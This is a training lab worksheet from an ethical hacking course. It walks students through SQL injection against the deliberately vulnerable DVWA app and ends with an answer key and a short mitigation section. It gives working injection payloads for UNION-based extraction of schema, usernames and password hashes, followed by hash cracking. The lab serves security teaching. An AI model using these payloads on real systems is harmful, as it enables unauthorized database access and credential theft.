Lab - Injection Attacks: Objectives

Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 6

Lab - Injection Attacks

Objectives
Websites that are connected to backend databases can be vulnerable to SQL
injection. In a SQL injection exploit, an attacker enters malicious queries that interact
with the application database. In this lab, you will exploit a web site vulnerability with
SQL injection and research SQL injection mitigation.

 Part 1: Exploit an SQL Injection Vulnerability on DVWA


 Part 2: Research SQL Injection Mitigation

Background / Scenario
SQL injection is a common attack used by hackers to exploit SQL database-driven
web applications. This type of attack involves inserting malicious SQL code or
statements into an input field or URL with the goal of reveling or manipulating the
database contents, causing repudiation system issues, or spoofing identities.

Required Resources
 Kali VM customized for the Ethical Hacker course
 Internet access

Instructions
Part 1: Exploit an SQL Injection Vulnerability on
DVWA
SQL injection is a code injection technique used to exploit security vulnerabilities in
the database layer of an application. These vulnerabilities could allow an attacker to
execute malicious SQL commands and compromise the security of the database.

In this part you will exploit a SQL vulnerability on the DVWA.

Step 1: Prepare DVWA for SQL Injection Exploit.

a. Open your browser and navigate to the DVWA at http://10.6.6.13.


b. Enter the credentials: admin / password.
c. Set DVWA to Low Security.
1. Click DVWA Security in the left pane.
2. Change the security level to Low and click Submit.

Step 1: Check DVWA to see if a SQL Injection Vulnerability is Present.


a. Click SQL Injection in the left pane.
b. In the User ID: field type ' OR 1=1 # and click Submit.
c. You should receive the output shown below. The output confirms that there is
a vulnerability present that permits execution of SQL statements that are
entered directly into input fields.

ID: ' or 1=1 #


First name: admin
Surname: admin

ID: ' or 1=1 #


First name: Gordon
Surname: Brown

ID: ' or 1=1 #


First name: Hack
Surname: Me

ID: ' or 1=1 #


First name: Pablo
Surname: Picasso

ID: ' or 1=1 #


First name: Bob
Surname: Smith

You have entered an “always true” expression that was executed by the
database server. The result is that all entries in the ID field of the database
were returned.

Step 3: Check for Number of Fields in the Query.

a. In the User ID: field type 1' ORDER BY 1 # and click Submit.

You should receive the following output:

ID: 1' ORDER BY 1#


First name: admin
Surname: admin

b. In the User ID: field type 1' ORDER BY 2 # and click Submit.

You should receive the following output:

ID: 1' ORDER BY 2#


First name: admin
Surname: admin

c. In the User ID: field type 1' ORDER BY 3 # and click Submit.
This time you should receive the error Unknown column '3' in 'order clause'.

Because the third string returned an error, this tells us the query involves two
fields. This is useful information to know as you continue your exploit.

Step 4: Check for version Database Management System (DBMS).

In the User ID: field type 1' OR 1=1 UNION SELECT 1, VERSION()# and
click Submit.

At the end of the output, you should see a result similar to the following:

<output omitted>
ID: 1' OR 1=1 UNION SELECT 1, VERSION()#
First name: Pablo
Surname: Picasso

ID: 1' OR 1=1 UNION SELECT 1, VERSION()#


First name: Bob
Surname: Smith

ID: 1' OR 1=1 UNION SELECT 1, VERSION()#


First name: 1
Surname: 5.5.58-0+deb8u1

The output 5.5.58-0+deb8u1 indicates the DBMS is MySQL version 5.5.58 running
on Debian.

Step 5: Determine the database name.

So far you have learned that the database is vulnerable, the query involves two
fields, and the DDMS is MySQL 5.5.58.

Next, you will attempt obtain more schema information about the database.

In the User ID: field type 1' OR 1=1 UNION SELECT 1, DATABASE()# and
click Submit.

At the end of the output, you should see the following result:

ID: 1’ OR 1=1 UNION SELECT 1, DATABASE()#


First name: 1
Surname: dvwa

This means the name of the database is dvwa.

Step 6: Retrieve table Names from the dvwa database.

a. In the User ID: field type:


1' OR 1=1 UNION SELECT 1,table_name FROM
information_schema.tables WHERE table_type='base table'
AND table_schema='dvwa'#

b. Click Submit.

The output with First Name: 1 is the table information.

What are the two tables that were found?

Answer Area
guestbook and users
Hide Answer
Which table do you think is the most interesting for a penetration test?

Answer Area
The users table is the most interesting because it may include usernames and
passwords.
Hide Answer

Step 1: Retrieve column names from the users table.

You will now discover the field names in the users table. This will help you to find
information that is useful for the pentest.

a. In the User ID: field type:

1' OR 1=1 UNION SELECT 1,column_name FROM


information_schema.columns WHERE table_name='users'#

b. Click Submit.

The list of column names displays after the listing of user accounts in the output. The
information in which two columns is of interest to use in our penetration test?
Explain.

Answer Area
The user column and the password column are of interest because they seem
to contain information that can be used for unauthorized access.
Hide Answer

Step 8: Retrieve the user credentials.

This query will retrieve the users and passwords.


a. In the User ID: field type:

1' OR 1=1 UNION SELECT user, password FROM users #

b. Click Submit.

After the list of users, you should see several results with usernames and
what appears to be password hashes.

Which account could be the most valuable in our pentest? Explain.

Answer Area
The admin account, it probably has the greatest rights and privileges on the
system.
Hide Answer

c. Try crafting queries to display the contents of other fields in the table by
varying the column names based on the names previously displayed.

What is the difference between the user_id and user fields?

Answer Area
The user_id is a number, while the user field is the username.
Hide Answer

Step 9: Hack the password hashes.

a. Open another browser tab and navigate to https://crackstation.net.

CrackStation is a free online password hash cracker.

b. Copy and paste the password hash from DVWA into CrackStation and
click Crack Hashes.

What is the password of the admin account?

Answer Area
password
Hide Answer
What is the password for the user pablo?

Answer Area
letmein
Hide Answer

Part 2: Research SQL Injection Mitigation


Step 1: Conduct online research on SQL injection mitigation.

a. Open a web browser and search SQL injection mitigation and SQL injection
prevention.
b. Take notes on your mitigation and prevention findings.

Reflection Questions
What are three mitigation methods for preventing SQL injection exploits?

Answer Area
Answers may vary but may include: using parameterized queries (prepared
statements), input checking, field validation, filtering user inputs, and
escaping user input.
Hide Answer

You might also like